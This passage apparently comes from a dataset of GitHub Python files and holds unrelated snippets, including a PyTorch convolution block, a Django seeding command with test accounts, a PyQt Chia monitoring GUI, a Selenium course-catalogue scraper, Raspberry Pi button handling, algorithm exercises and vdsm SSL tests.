weight = weight / std.expand_as(weight)\n return F.conv3d(x, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n\ndef conv3x3x3(in_planes, out_planes, kernel_size=(3,3,3), stride=(1,1,1), padding=1, dilation=1, bias=False, weight_std=False):\n \"3x3x3 convolution with padding\"\n if weight_std:\n return Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\n else:\n return nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\nclass NoBottleneck(nn.Module):\n def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, fist_dilation=1, multi_grid=1, weight_std=False):\n super(NoBottleneck, self).__init__()\n self.weight_std = weight_std\n self.gn1 = nn.GroupNorm(16, inplanes)\n self.conv1 = conv3x3x3(inplanes, planes, kernel_size=(3, 3, 3), stride=stride, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.relu = nn.LeakyReLU(0.1,inplace=in_place)\n\n self.gn2 = nn.GroupNorm(16, planes)\n self.conv2 = conv3x3x3(planes, planes, kernel_size=(3, 3, 3), stride=1, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.downsample = downsample\n self.dilation = dilation\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.gn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n\n\n out = self.gn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out = out + residual\n\n return out","repo_name":"SooLab/CCQ","sub_path":"code/network/utils_.py","file_name":"utils_.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"11442396512","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User, Permission\nfrom django.contrib.auth.models import Group\nfrom activities.models import Local, Activity, Dish\nfrom users.models import Guest, Chef, Monitor, Manager, Plan\nfrom django.contrib.contenttypes.models import ContentType\n\n\nclass Command(BaseCommand):\n args = ''\n help = 'our help string comes here'\n\n def _migrate(self):\n # Drop all tables\n print('Dropping tables...')\n\n User.objects.all().delete()\n Activity.objects.all().delete()\n Local.objects.all().delete()\n Dish.objects.all().delete()\n\n print('Dropping tables...OK')\n print('Populating database...')\n\n # ==================================================================================================\n # ==================================================================================================\n\n Group.objects.get_or_create(name='Guest')\n Group.objects.get_or_create(name='Monitor')\n Group.objects.get_or_create(name='Chef')\n Group.objects.get_or_create(name='Manager')\n print('Groups created...Ok')\n\n plan = ContentType.objects.get_for_model(Plan)\n Permission.objects.get_or_create(codename='free',\n name='Free',\n content_type=plan)\n Permission.objects.get_or_create(codename='lite',\n name='Lite',\n content_type=plan)\n Permission.objects.get_or_create(codename='premium',\n name='Premium',\n content_type=plan)\n print('Permissions created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n admin_admin = User(\n username='admin',\n email='admin@admin.com')\n admin_admin.set_password('admin')\n admin_admin.is_staff = True\n admin_admin.is_superuser = True\n admin_admin.save()\n\n print('Admins created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n guest1 = Guest(\n username='guest1',\n email='guest1@guest1.com',\n first_name='guest1',\n avatar='/images/user1.ico',\n )\n guest1.set_password('guest1')\n guest1.save()\n guest1.groups.add(Group.objects.get(name='Guest'))\n\n guest2 = Guest(\n username='guest2',\n email='guest2@guest2.com',\n first_name='guest2',\n )\n guest2.set_password('guest2')\n guest2.save()\n guest2.groups.add(Group.objects.get(name='Guest'))\n print('Guests created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n chef1 = Chef(\n username='chef1',\n email='chef1@chef1.com',\n first_name='chef1',\n )\n chef1.set_password('chef1')\n chef1.save()\n chef1.groups.add(Group.objects.get(name='Chef'))\n chef1.user_permissions.add(Permission.objects.get(name='Free'))\n\n chef2 = Chef(\n username='chef2',\n email='chef2@chef2.com',\n first_name='chef2',\n )\n chef2.set_password('chef2')\n chef2.save()\n chef2.groups.add(Group.objects.get(name='Chef'))\n chef2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Chefs created...Ok')\n\n # ==================================================================================================\n # 
==================================================================================================\n\n monitor1 = Monitor(\n username='monitor1',\n email='monitor1@monitor1.com',\n first_name='monitor1',\n )\n monitor1.set_password('monitor1')\n monitor1.save()\n monitor1.groups.add(Group.objects.get(name='Monitor'))\n monitor1.user_permissions.add(Permission.objects.get(name='Free'))\n\n monitor2 = Monitor(\n username='monitor2',\n email='monitor2@monitor2.com',\n first_name='monitor2',\n )\n monitor2.set_password('monitor2')\n monitor2.save()\n monitor2.groups.add(Group.objects.get(name='Monitor'))\n monitor2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Monitors created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n manager1 = Manager(\n username='manager1',\n email='manager1@manager1.com',\n first_name='manager1',\n )\n manager1.set_password('manager1')\n manager1.save()\n manager1.groups.add(Group.objects.get(name='Manager'))\n manager1.user_permissions.add(Permission.objects.get(name='Free'))\n\n manager2 = Manager(\n username='manager2',\n email='manager1@manager2.com',\n first_name='manager2',\n )\n manager2.set_password('manager2')\n manager2.save()\n manager2.groups.add(Group.objects.get(name='Manager'))\n manager2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Managers created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n activity1 = Activity(\n name='activity1',\n description='activity1Description',\n place='activity1Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2017-3-5',\n price_per_person=6,\n end_date='2017-7-29',\n owner=monitor1\n )\n activity1.save()\n activity1.assistants.add(guest1)\n activity1.assistants.add(guest2)\n\n activity2 = Activity(\n name='activity2',\n description='activity2Description',\n place='activity2Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2010-3-15',\n end_date='2017-7-29',\n price_per_person=6,\n owner=monitor2,\n )\n activity2.save()\n activity2.assistants.add(guest1)\n\n print('Activities... ok')\n # ==================================================================================================\n # ==================================================================================================\n\n local1 = Local(\n name='local1',\n description='description',\n address='address1',\n latitude=10.00,\n longitude=12.00,\n manager=manager1)\n local1.save()\n\n local2 = Local(\n name='local2',\n description='description',\n address='address2',\n latitude=10.00,\n longitude=12.00,\n manager=manager2)\n local2.save()\n\n print('Locals... 
Ok')\n\n # ==================================================================================================\n # Dish\n # ==================================================================================================\n\n dish1 = Dish(name='dish1', description='dish1Description', date='2017-02-5', hour='12:00', owner=chef1,\n max_assistants=3, contribution=5.6,\n photo='http://valenciaoberta.es/wp-content/uploads/2016/08/paella-2.jpg')\n dish1.save()\n dish1.assistants.add(guest1)\n dish1.assistants.add(guest2)\n dish2 = Dish(name='dish2', description='dish2Description', date='2017-03-15', hour='13:00', owner=chef1,\n max_assistants=3, contribution=4.0)\n dish2.save()\n dish3 = Dish(name='dish3', description='dish3Description', date='2017-03-25', hour='14:00', owner=chef2,\n max_assistants=1, contribution=2.0)\n dish3.save()\n dish4 = Dish(name='dish4', description='dish4Description', date='2017-08-29', hour='14:00', owner=chef2,\n max_assistants=5, contribution=5.0)\n dish4.save()\n dish5 = Dish(name='dish5', description='dish5Description', date='2017-8-25', hour='15:00', owner=chef2,\n max_assistants=10, contribution=3.6)\n dish5.save()\n\n print('Dishes... Ok')\n\n print('Populating database...OK\\n'\n 'Ready to use!')\n\n def handle(self, *args, **options):\n self._migrate()\n","repo_name":"andreslopezalbin/NetMeals","sub_path":"netmeals/management/commands/populatedb.py","file_name":"populatedb.py","file_ext":"py","file_size_in_byte":9325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"39411687751","text":"from BaseSolution import *\nfrom ListNode import *\nclass LinkedListCycle(BaseSolution):\n def __init__(self):\n BaseSolution.__init__(self)\n\n def solution(self, head):\n if not head: return False\n newHead = ListNode(-1)\n newHead.next = head\n slow = newHead\n fast = newHead.next\n while slow and fast and fast.next:\n if slow == fast: return True\n slow = slow.next\n fast = fast.next.next\n return False\n\n","repo_name":"caunion/leetcode","sub_path":"solutions/LinkedListCycle.py","file_name":"LinkedListCycle.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"11308948400","text":"print('2자리의 양수를 입력하세요.')\n\nwhile True:\n no = int(input('값을 입력하세요.: '))\n if not(no < 10 or no > 99):\n break\n\nprint(f'입력받은 양수는 {no}입니다.')\n\n#De Morgan's law. If not 2 digit number, makes the user input again.","repo_name":"dennis1219/algorithm_study","sub_path":"python/01_basics/2digits1_de_morgan.py","file_name":"2digits1_de_morgan.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"13849217521","text":"import sys,os\nfrom PyQt5.QtWidgets import QLineEdit, QGridLayout,QLabel ,QPushButton,QCheckBox \nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import QTimer\nfrom logging.handlers import RotatingFileHandler\n\n\n\nimport logging\nfrom run import achia_logger\nimport yaml\n\n\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\n# # create formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# # add formatter to ch\nch.setFormatter(formatter)\n\nfile_handler = RotatingFileHandler('achia-debug.log', maxBytes=2000, backupCount=10)\nfile_handler.setLevel(logging.DEBUG)\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\n# # if logger.handlers:\n# # print(logger.handlers)\n# # for hnd in logger.handlers:\n# # logger.removeHandler(hnd)\n\n# # add ch to logger\n\n\n\n\nlogger_gui = logging.getLogger()\nlogger_gui.setLevel(logging.DEBUG)\n# if logger_gui.handlers:\n# print(logger_gui.handlers)\n# for hnd in logger_gui.handlers:\n# logger_gui.removeHandler(hnd)\n# # You can control the logging level\n# logger_gui.setLevel(logging.DEBUG)\n\n\nclass QTextEditLogger(logging.Handler):\n def __init__(self, parent):\n super().__init__()\n self.widget = QtWidgets.QPlainTextEdit(parent)\n self.widget.setReadOnly(True)\n\n def emit(self, record):\n msg = self.format(record)\n self.widget.appendPlainText(msg)\n\n\nclass MyDialog(QtWidgets.QDialog, QtWidgets.QPlainTextEdit):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.current_directory = os.path.dirname(__file__)\n self.note_icon = os.path.join( self.current_directory,'img','logo.ico' )\n self.file_name = 'achia.yaml'\n\n try:\n f = open(self.file_name, 'r')\n self.config = yaml.load(stream=f, Loader=yaml.Loader)\n f.close() \n if not isinstance(self.config, dict):\n self.config = dict()\n except:\n self.config = dict()\n print(self.config)\n self.chia_logger = achia_logger() \n \n\n \n\n logTextBox = QTextEditLogger(self)\n logTextBox.setLevel(logging.INFO)\n\n # You can format what is printed to text box\n logTextBox.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\n logger_gui.addHandler(logTextBox)\n\n grid = QGridLayout()\n grid.setSpacing(2)\n \n e1_lable = QLabel('Token')\n e2_lable = QLabel('Machine ID')\n e3_lable = QLabel('Plotting Logs Path')\n\n self.e1 = QLineEdit(self.config.get(\"TOKEN\",\"Token xxxxxxxxxxxxxxxxxx\"))\n self.e2 = QLineEdit(self.config.get(\"MACHINE_ID\",\"xxxxxx\"))\n self.e3 = QLineEdit(self.config.get(\"PLOTTING_LOGS_PATH\",\"\"))\n self.e3.setPlaceholderText(\"Put in the folder of the plotting logs\")\n label = QLabel()\n label.setText('https://achia.co')\n label.setOpenExternalLinks(True)\n \n grid.addWidget(e1_lable, 1, 0, 1,1)\n grid.addWidget(self.e1, 1, 1, 1,4)\n\n grid.addWidget(e2_lable, 2, 0,1,1)\n grid.addWidget(self.e2, 2, 1,1,4)\n\n grid.addWidget(e3_lable, 3, 0,1,1)\n grid.addWidget(self.e3, 3, 1,1,4)\n \n \n logo = QLabel()\n logo.setPixmap(QtGui.QPixmap(os.path.join( self.current_directory,'img','logo-text.png' )).scaledToWidth(160))\n version = QLabel(\"Version: 0.2\")\n \n self.startBtn=QPushButton('Start')\n self.endBtn=QPushButton('Stop')\n \n sublayout1 = QtWidgets.QVBoxLayout()\n sublayout1.addWidget(logo, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(label, alignment=QtCore.Qt.AlignCenter)\n sublayout1.addWidget(version, 
alignment=QtCore.Qt.AlignCenter)\n self.is_debug = QCheckBox(\"Save debug log\")\n self.is_debug.setChecked(True)\n sublayout1.addWidget(self.is_debug)\n sublayout1.addWidget(self.startBtn)\n sublayout1.addWidget(self.endBtn)\n \n grid.addLayout(sublayout1, 4, 0, 6, 1)\n grid.addWidget(logTextBox.widget,4, 1, 6, 4)\n \n self.startBtn.clicked.connect(self.start)\n self.endBtn.clicked.connect(self.end)\n \n\n \n self.setLayout(grid)\n self.setGeometry(800, 500, 800, 300)\n self.setWindowTitle('aChia Dash Monitor')\n self.setWindowIcon(QtGui.QIcon(self.note_icon)) \n self.timer=QTimer()\n self.timer.timeout.connect(self.run)\n \n self.chia_logger.config = self.config\n \n def get_value(self):\n self.config[\"TOKEN\"] = self.e1.text() \n self.config[\"MACHINE_ID\"] = self.e2.text()\n self.config[\"PLOTTING_LOGS_PATH\"] = self.e3.text()\n with open(self.file_name, 'w') as yaml_file:\n yaml.dump(self.config, yaml_file, default_flow_style=False)\n\n def run(self):\n self.chia_logger.run() \n \n def start(self):\n try:\n self.get_value()\n logging.info(\"***********Starting aChia Dash Monitor***********\")\n logging.info(f\"TOKEN = {self.config['TOKEN']}\" )\n logging.info(f\"MACHINE_ID = {self.config['MACHINE_ID']}\" )\n logging.info(f\"PLOTTING_LOGS_PATH = {self.config['PLOTTING_LOGS_PATH']}\" )\n logging.info(\"********************************************\" )\n self.is_debug.setEnabled(False)\n if self.is_debug.isChecked():\n logger_gui.setLevel(logging.DEBUG)\n logging.info(\"DEBUG is ON\" )\n else:\n logger_gui.setLevel(logging.INFO)\n logging.info(\"DEBUG is OFF\" )\n \n self.chia_logger.set_value()\n self.run() \n self.timer.start(60000)\n self.startBtn.setEnabled(False)\n self.endBtn.setEnabled(True)\n except Exception as e:\n logging.error(e)\n \n def end(self):\n logging.info(\"***********Stopped*********\" )\n self.timer.stop()\n self.startBtn.setEnabled(True)\n self.endBtn.setEnabled(False) \n self.is_debug.setEnabled(True)\n\n \n\n\n \nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n widget = MyDialog()\n widget.show()\n #widget.line_edit.setText('Text updated!')\n ret = sys.exit(app.exec_())\n sys.exit(ret)\n","repo_name":"achia-co/achia-dash","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"9691561781","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nchrome = webdriver.Chrome()\nchrome.implicitly_wait(10)\nchrome.get(\"http://study.foton.com.cn\")\nchrome.maximize_window()\ncategory_list = ['领导力学院', '工程学院', '制造学院', '营销学院', '金融学院', '其他专业课程', '国际学院', '通用类', '精品微课',\n '计划类(面授)课程', '主题学习', '生产管��学院', '事业部专有课程', '研发管理学院', '市场运营学院', '财务管理学院',\n '销售管理学院', '人力资源学院', '职业化学院', '领导力学院', '综合管理学院', '个人发展学院']\n\n\ndef login():\n account = input('请输入用户名:')\n password = input('请输入密码:')\n\n ele = chrome.find_element_by_id(\"loginName\")\n ele.click()\n ele.send_keys(account)\n\n ele = chrome.find_element_by_id(\"password\")\n ele.click()\n ele.send_keys(password)\n\n time.sleep(1)\n ele = chrome.find_element_by_css_selector(\"#fm1 > input.btn.btn-block.btn-primary.btn-lg\")\n ele.click()\n\n\ndef find_courses_data():\n with open('course_data.txt', 'w', encoding='utf-8') as f:\n f.write('课程名称,')\n f.write('课程ID,')\n f.write('课程学分,')\n f.write('结业条件\\n')\n chrome.switch_to.frame(chrome.find_element_by_xpath('/html/body/div[2]/div[4]/div[2]/iframe'))\n time.sleep(3)\n # above = chrome.find_element_by_partial_link_text(\"学习中心\")\n study_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '学习中心')))\n time.sleep(1)\n ActionChains(chrome).move_to_element(study_center).perform()\n time.sleep(2)\n # above = chrome.find_element_by_link_text(\"课程中心\")\n course_center = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '课程中心')))\n course_center.click()\n chrome.switch_to.default_content()\n time.sleep(2)\n chrome.switch_to.frame(chrome.find_element_by_id('tbc_window_iframe_19'))\n time.sleep(2)\n for category in category_list:\n # ele = chrome.find_element_by_partial_link_text(category)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, category)))\n ele.click()\n time.sleep(2)\n try:\n last_page = int(chrome.find_element_by_class_name('pagnum-last').text)\n except:\n last_page = 1\n for i in range(1, last_page+1):\n cp = 1\n # ele = chrome.find_element_by_id('categoryFilterResult')\n time.sleep(1)\n ele = WebDriverWait(chrome, 15, 0.5).until(\n EC.presence_of_element_located((By.ID, 'categoryFilterResult'))\n )\n # ul = ele.find_element_by_tag_name('ul')\n ul = WebDriverWait(ele, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'ul'))\n )\n # li_list = ul.find_elements_by_tag_name('li')\n li_list = WebDriverWait(ul, 15, 0.5).until(\n EC.presence_of_all_elements_located((By.TAG_NAME, 'li'))\n )\n for li in li_list:\n time.sleep(0.2)\n # div = li.find_element_by_class_name('list-p')\n div = WebDriverWait(li, 15, 0.5).until(\n EC.presence_of_element_located((By.CLASS_NAME, 'list-p')))\n # h3 = div.find_element_by_tag_name('h3')\n h3 = WebDriverWait(div, 15, 0.5).until(\n EC.presence_of_element_located((By.TAG_NAME, 'h3')))\n course_name = h3.text\n f.write(course_name + ',')\n course_id = h3.get_attribute('data-id')\n f.write(course_id + ',')\n detial_list = div.find_elements_by_class_name('learndetail')\n detial_credit = detial_list[0]\n # 这里的credit是str类型\n credit = detial_credit.find_elements_by_tag_name('span')[1].find_element_by_tag_name('em').text\n f.write(credit)\n f.write(',')\n completion = 
div.find_element_by_class_name('coursebrief').find_element_by_tag_name('em').text\n f.write(completion + '\\n')\n if last_page > 1:\n if cp < last_page:\n # next_page = chrome.find_element_by_class_name('pag-next-page')\n next_page = WebDriverWait(chrome, 30, 0.5).until(\n EC.presence_of_element_located((By.PARTIAL_LINK_TEXT, '下一页')))\n next_page.click()\n cp += 1\n time.sleep(3)\n\n\nif __name__ == \"__main__\":\n login()\n find_courses_data()\n chrome.quit()\n\n\n\n\n","repo_name":"Idealisten/OneClickToLearnFotonUniversityOnlineStudyPlatform","sub_path":"GetAllCourseData.py","file_name":"GetAllCourseData.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"26601972307","text":"# currently set to nsims = 250 and dirlimit = 25; reset to 2500 and 250 for production runs\n\nimport os\nfrom math import ceil\nfrom string import ascii_lowercase as letters\n\nimport numpy as np\nimport pandas as pd\nimport InterruptionAnalysis as ia\nimport Independent as sim\n\nnp.random.seed(12345)\n\n# import reference data and convert time step to 1/10th second\ndata = pd.read_csv('./data/timeseries.csv', index_col = 0)\nnumeric_cols = ['begin', 'end', 'dur', 'lat']\nfor col in numeric_cols:\n data[col] = data[col]/100\n\n# keep only those agents analyzed in the DHVg analysis: those with |x| >= 20\nsample = list(data.groupby(\"pID\")[\"dur\"].count().loc[lambda x: x >= 20].index)\n\n# estimate /p/ and /q/ for each r_i and collect it into a data frame indexed by pID with columns \"p\" and \"q\"\nrows = {}\nfor pID in sample:\n P_i = ia.get_transition_matrix(data, pID)\n p = P_i[0, 1]\n q = P_i[1, 0]\n rows[pID] = [p, q]\nP = pd.DataFrame.from_dict(rows, orient = \"index\", columns = [\"p\", \"q\"])\n\n# sim parameters for all sims\nnsims = 250\n\n####\n## Timer Code\n## prints to stdout the time it takes to simulate one reference individual nsims times\n## does not save any data\n# import time\n# time1 = time.time()\n# pID = np.random.choice(sample)\n# row = P[P.index.isin([pID])]\n# P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n# gID = pID[:3]\n# T = round(data[data[\"gID\"] == gID][\"end\"].max())\n# # these two are the same for all in this file, but would change otherwise\n# N = 1\n# ns = list(range(N))\n# for run in range(nsims):\n# Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n# X = ia.Y_to_X(Y, ns)\n# time2 = time.time()\n# print(time2 - time1)\n## end timer code\n####\n\n# prepare subdirectory structure\n# separate sims into subdirectories to speed file lookup\nsavepath = \"./data/simulations/mimic-agents\"\nif not os.path.isdir(savepath):\n os.mkdir(savepath)\ndirlimit = 25\nnsubdirs = ceil(nsims/dirlimit)\n\n# main loop\nfor pID in sample:\n print(pID)\n # select reference individual and associated transition matrix\n row = P[P.index.isin([pID])]\n P_i = np.array([[1 - row[\"p\"], row[\"p\"]], [row[\"q\"], 1 - row[\"q\"]]])\n \n # set sim parameters for this sim\n gID = pID[:3]\n T = round(data[data[\"gID\"] == gID][\"end\"].max())\n # these two are the same for all in this file, but would change otherwise\n N = 1\n ns = list(range(N))\n\n # prepare subdirectories for this pID\n pidpath = savepath + f\"/{pID}\"\n if not os.path.isdir(pidpath):\n os.mkdir(pidpath)\n for i in range(nsubdirs):\n subpath = f\"{pidpath}/{letters[i]}\"\n if not os.path.isdir(subpath):\n os.mkdir(subpath)\n\n # run the sims\n pointer = 0\n subdir = letters[pointer]\n for run in range(nsims):\n if run > 0 and run % dirlimit == 0:\n pointer += 1\n subdir = letters[pointer]\n Y = sim.simulation(P_i, T, N, ns, oneagent = True)\n X = ia.Y_to_X(Y, ns)\n # and store them in the appropriate place\n X.to_csv(f\"{pidpath}/{subdir}/{pID}-{run}.csv\")\n\n","repo_name":"ngmaclaren/interruption-abm","sub_path":"generate-mimic-agents.py","file_name":"generate-mimic-agents.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1431386758","text":"\"\"\"Urls for feedgrabber categories\"\"\"\nfrom django.conf.urls.defaults import *\n\nfrom feedgrabber.models import Category\n\ncategory_conf = {'queryset': Category.objects.all()}\n\nurlpatterns = patterns('django.views.generic.list_detail',\n url(r'^$', 'object_list',\n category_conf, 'feedgrabber_category_list'),\n )\n\nurlpatterns += patterns('feedgrabber.views.categories',\n url(r'^(?P[-\\w]+)/$', 'view_category_detail',\n name='feedgrabber_category_detail'),\n )\n","repo_name":"Fantomas42/django-feedgrabber","sub_path":"feedgrabber/urls/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"}
+{"seq_id":"2844467872","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom socketIO_client import SocketIO, BaseNamespace\nfrom config import CLIENT_HOST, PORT, RPiConfig\n\nsio = SocketIO(CLIENT_HOST, PORT)\nispace = sio.define(BaseNamespace, '/input')\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\ntry:\n GPIO.setup([RPiConfig.LEFT_BUTTON_PIN, RPiConfig.RIGHT_BUTTON_PIN], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.setup([RPiConfig.LEFT_DIOD_PIN, RPiConfig.RIGHT_DIOD_PIN], GPIO.OUT, initial = GPIO.LOW)\n while True:\n if GPIO.input(RPiConfig.LEFT_BUTTON_PIN):\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '1'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.LEFT_DIOD_PIN, GPIO.LOW)\n if GPIO.input(RPiConfig.RIGHT_BUTTON_PIN):\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.HIGH)\n ispace.emit('button pressed', {'data': '2'})\n sleep(RPiConfig.DIOD_TIMEOUT)\n GPIO.output(RPiConfig.RIGHT_DIOD_PIN, GPIO.LOW)\n sleep(0.05)\nfinally:\n GPIO.cleanup()\n","repo_name":"ivellios/familiaria","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27894501167","text":"#!/usr/bin/python3\n\nimport hidden_4\n\n\ndef main():\n \"\"\"Get the names that are in the file using the dir() function.\n Go through each name to make sure that only the ones\n that do not start with '__' are stored in the names list.\n Print each name from the sorted list of names.\n Sorting will be handled with the sorted() method\n \"\"\"\n\n names = [name for name in dir(hidden_4) if not name.startswith('__')]\n\n for name in sorted(names):\n print(name)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ShawnZain/alx-higher_level_programming","sub_path":"0x02-python-import_modules/4-hidden_discovery.py","file_name":"4-hidden_discovery.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74061969929","text":"import apprise\n\nimport logging\n\nlog = logging.getLogger('apprise')\n\n\nclass Apprise:\n NAME = \"Apprise\"\n\n def __init__(self, url, title='Cloudplow'):\n self.url = url\n self.title = title\n log.debug(\"Initialized Apprise notification agent\")\n\n def send(self, **kwargs):\n if not self.url:\n log.error(\"You must specify a URL when initializing this class\")\n return False\n\n # send notification\n try:\n apobj = apprise.Apprise()\n apobj.add(self.url)\n apobj.notify(\n title=self.title,\n body=kwargs['message'],\n )\n\n except Exception:\n log.exception(f\"Error sending notification to {self.url}\")\n return False\n","repo_name":"l3uddz/cloudplow","sub_path":"utils/notifications/apprise.py","file_name":"apprise.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"16"}
+{"seq_id":"75045815","text":"import random\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport time\r\n\r\nclass Reservoir:\r\n def __init__(self,k): #k개 샘플링하겠다.\r\n self.sampled = []\r\n self.k = k\r\n self.cnt =0 # 몇 번째로 들어온 아이템인지 나타내는 변수\r\n\r\n def put(self, item): #스트림에서 item 하나가 reservoir sampled로 들어옴\r\n if self.cnt < self.k: # k개 이하로 들어올 경우 : 배열에 그냥 추가\r\n self.sampled.append(item)\r\n else: # k개 이상이 들어왔을 경우 : r target:\n ed = mid - 1\n else:\n st = mid\n return nums[st]\n\ndef UptimalUtilization(a, b, target):\n a.sort(key=lambda x:x[1])\n b.sort(key=lambda x:x[1])\n len1 = len(a)\n len2 = len(b)\n curval = 0\n res = []\n for idx1, num1 in a:\n idx2, num2 = find_element(b,target-num1)\n if num1 + num2 <= target:\n print(num1+num2)\n if curval < num1 + num2:\n curval = num1 + num2\n res = [[idx1, idx2]]\n elif curval == num1 + num2:\n res.append([idx1, idx2])\n return res\n\n\na = [[1, 2], [2, 4], [3, 6]]\nb = [[1, 2]]\ntarget = 7\n#print(UptimalUtilization(a, b, target))\n\n\nprint (UptimalUtilization([(1,2000),(2,3000),(3,6000)],\n\t [(1,2000)], 7000))\n","repo_name":"SrilakshmiSripathi/Data_Structures_and_Algorithms_Practice","sub_path":"DataStructures/Assorted/airtime3.py","file_name":"airtime3.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70574112007","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport socket\n\nimport pytest\n\nfrom vdsm.common import cmdutils\nfrom vdsm.common import concurrent\nfrom vdsm.common import commands\nfrom vdsm.protocoldetector import MultiProtocolAcceptor\nfrom vdsm.sslutils import SSLContext, SSLHandshakeDispatcher\nfrom yajsonrpc.betterAsyncore import Reactor\n\nfrom integration.sslhelper import key_cert_pair # noqa: F401\n\n\n@pytest.fixture\ndef fake_gethostbyaddr(monkeypatch, request):\n entry = getattr(request, 'param', None)\n if entry is not None:\n hostname, ipaddrlist = entry\n\n def impl(addr):\n if addr not in ipaddrlist:\n raise socket.herror()\n return (hostname, [], ipaddrlist)\n\n monkeypatch.setattr('vdsm.sslutils.socket.gethostbyaddr', impl)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_same_string(fake_gethostbyaddr):\n assert SSLHandshakeDispatcher.compare_names('10.0.0.1', 'example.com')\n\n\n@pytest.mark.parametrize('lhs,rhs', [('::ffff:127.0.0.1', '127.0.0.1'),\n ('127.0.0.1', '::ffff:127.0.0.1')])\ndef test_mapped_address(lhs, rhs):\n assert SSLHandshakeDispatcher.compare_names(lhs, rhs)\n\n\n@pytest.mark.parametrize('fake_gethostbyaddr', [('example.com', ['10.0.0.1'])],\n indirect=True)\ndef test_failed_mapped_address(fake_gethostbyaddr):\n assert not SSLHandshakeDispatcher.compare_names('10.0.0.1',\n 